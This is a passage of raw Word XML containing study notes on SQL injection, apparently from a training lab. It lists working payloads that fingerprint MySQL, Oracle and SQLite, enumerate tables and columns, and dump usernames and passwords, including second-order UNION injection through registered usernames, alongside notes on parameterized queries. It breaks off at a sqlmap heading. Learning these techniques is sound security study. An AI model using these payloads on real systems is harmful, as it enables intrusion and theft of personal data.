        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>enumerate database via UPDATE statement on profile page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1D5101" w14:textId="4587A03F" w:rsidR="0066428C" w:rsidRDefault="0066428C" w:rsidP="0066428C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view source page and identify potential column names by looking at attribute table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1B6DF2" w14:textId="29BFF212" w:rsidR="00017D7D" w:rsidRDefault="00017D7D" w:rsidP="0066428C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>confirm vulnerability by injecting something into nickname and email fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B672A2" w14:textId="37D8C031" w:rsidR="00CE5464" w:rsidRDefault="00CE5464" w:rsidP="00CE5464">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nickname and email fields are practical specific, can change depending on website to website basis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7E36E" w14:textId="43752889" w:rsidR="00017D7D" w:rsidRDefault="00017D7D" w:rsidP="00017D7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. asd’,nickname=’test’,email=’hacked</w:t>
      </w:r>
      <w:r w:rsidR="00046634">
        <w:t xml:space="preserve"> (into input boxes, not burp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0E86A" w14:textId="2F9F48AD" w:rsidR="00046634" w:rsidRDefault="00046634" w:rsidP="00046634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ID database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB3EF37" w14:textId="58D0E9FC" w:rsidR="00046634" w:rsidRDefault="00046634" w:rsidP="00046634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL and MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD4F0C" w14:textId="3A8B83E2" w:rsidR="00046634" w:rsidRDefault="00046634" w:rsidP="00046634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00046634">
        <w:t>',nickName=@@version,email='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154F49D9" w14:textId="3424177B" w:rsidR="00046634" w:rsidRDefault="00046634" w:rsidP="00046634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A5979B" w14:textId="0933F56E" w:rsidR="00046634" w:rsidRDefault="00046634" w:rsidP="00046634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00046634">
        <w:t>',nickName=(SELECT banner FROM v$version),email='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B31F0" w14:textId="6797390E" w:rsidR="00046634" w:rsidRDefault="00046634" w:rsidP="00046634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F74AED2" w14:textId="09DFEDE1" w:rsidR="00046634" w:rsidRDefault="00046634" w:rsidP="00046634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00046634">
        <w:t>',nickName=sqlite_version(),email='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB58722" w14:textId="1600F4B2" w:rsidR="003D2375" w:rsidRDefault="003D2375" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Once DB type is determined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB810A7" w14:textId="1A508238" w:rsidR="003D2375" w:rsidRDefault="003D2375" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>perform subquery to fetch all tables from databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA06A53" w14:textId="5A36A89F" w:rsidR="003D2375" w:rsidRDefault="003D2375" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="003D2375">
        <w:t>',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEFD478" w14:textId="54EB2CE9" w:rsidR="003D2375" w:rsidRDefault="003D2375" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Once tables are found, enter name into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D26C9FF" w14:textId="750A1C2C" w:rsidR="003D2375" w:rsidRDefault="003D2375" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D2375">
        <w:t>',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;ENTER NAMES HERE’</w:t>
      </w:r>
      <w:r w:rsidRPr="003D2375">
        <w:t>'),email='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE7BB33" w14:textId="35A38DF1" w:rsidR="003D2375" w:rsidRDefault="003D2375" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view names of columns such as UId, name, profileID, salary, passportNr, email, nickname, password, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E891736" w14:textId="5DADCBD9" w:rsidR="003D2375" w:rsidRDefault="003D2375" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Once names of columns are found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F721D38" w14:textId="50E4C148" w:rsidR="003D2375" w:rsidRDefault="003D2375" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>extract data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D7C663" w14:textId="788D6E38" w:rsidR="00CE5464" w:rsidRDefault="00CE5464" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>group_concat() function, as above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CA5A05" w14:textId="1151F2C4" w:rsidR="00CE5464" w:rsidRDefault="00CE5464" w:rsidP="003D2375">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5464">
        <w:t xml:space="preserve">',nickName=(SELECT group_concat(profileID || "," || name || "," || </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;COLUMN NAME&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5464">
        <w:t xml:space="preserve"> || ":") from </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;TABLE NAME HERE&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5464">
        <w:t>),email='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB1050" w14:textId="6CEB1A9C" w:rsidR="00CE5464" w:rsidRDefault="00930B25" w:rsidP="00CE5464">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00930B25">
        <w:t xml:space="preserve">',nickName=(SELECT group_concat(profileID || "," || </w:t>
      </w:r>
      <w:r>
        <w:t>secret text</w:t>
      </w:r>
      <w:r w:rsidRPr="00930B25">
        <w:t xml:space="preserve"> || ":") from </w:t>
      </w:r>
      <w:r>
        <w:t>secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00930B25">
        <w:t>),email='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3986D4" w14:textId="117DB95E" w:rsidR="00E25E60" w:rsidRDefault="00E25E60" w:rsidP="00CE5464">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shorten the input to include only as many || &lt;input&gt; || as needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D134F" w14:textId="4FEE036E" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790669BA" w14:textId="650C1584" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>applications may provide option to accept user-input as notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA2457E" w14:textId="71A4628E" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Applications may use parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65C9E3" w14:textId="2390F556" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL statement is specified first with placeholders (?) for parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20A582" w14:textId="1E5D2935" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>user input is passed into each parameter of the query later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7702A334" w14:textId="1AF22660" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows database to distinguish between code and data regardless of input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6E03B" w14:textId="65747D88" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. INSERT INTO notes (username, title, note) VALUES (?, ?, ?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4100BDB9" w14:textId="41976B0A" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Even if parameterized queries are used, the server will accept malicious data and place it in the database if application does not sanitize it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2236A" w14:textId="56B4D4A1" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>parameterized query prevents the input from leading to SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E0106" w14:textId="670F7D25" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>all queries must use parameterized queries, not just ones directly accepting user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840DA1E" w14:textId="1B2A5F3E" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>However, certain queries may be missed such as a query that fetches all of the notes belonging to a user does not used parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8CC48B" w14:textId="3A9BE53D" w:rsidR="004513D5" w:rsidRDefault="004513D5" w:rsidP="004513D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>direct concatenation into query makes SQL injection possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B638F8" w14:textId="4D153EA0" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>registering a user with a malicious name, unsafe query will fetch data for malicious user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431059D0" w14:textId="5B48D981" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. ‘ union select 1,2’ to allow for secondary injection trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CD0787" w14:textId="30D39F2F" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>navigating to notes page reveals column positions of Title and Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418EA37E" w14:textId="6BF4C4E6" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to continue exploit, create user to get all tables from database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28328BFD" w14:textId="1C798C14" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0508">
        <w:t>' union select 1,group_concat(tbl_name) from sqlite_master where type='table' and tbl_name not like 'sqlite_%''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF9E9F" w14:textId="749315E7" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>navigate back and view available tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC4710" w14:textId="3315A94D" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use table names to further enumerate data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610CD027" w14:textId="6FAC28D3" w:rsidR="006F2326" w:rsidRDefault="006F2326" w:rsidP="006F2326">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2326">
        <w:t>') union select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2326">
        <w:t>1,2,group_concat(username),group_concat(password) from users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090540A" w14:textId="021D3AD3" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To further enumerate tables that have been discovered</w:t>
      </w:r>
      <w:r w:rsidR="004E2D58">
        <w:t>, create user with name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267599D" w14:textId="36665A2A" w:rsidR="001F0508" w:rsidRDefault="001F0508" w:rsidP="001F0508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0508">
        <w:t>'  union select 1,group_concat(password) from users'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DC8DE" w14:textId="0A03FC58" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Automating Exploitation Using Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F483D3" w14:textId="7D66178F" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to exploit vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2D1B1" w14:textId="3B678868" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first register a malicious user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE8D886" w14:textId="2861CB44" w:rsidR="004E2D58" w:rsidRDefault="004E2D58" w:rsidP="004E2D58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
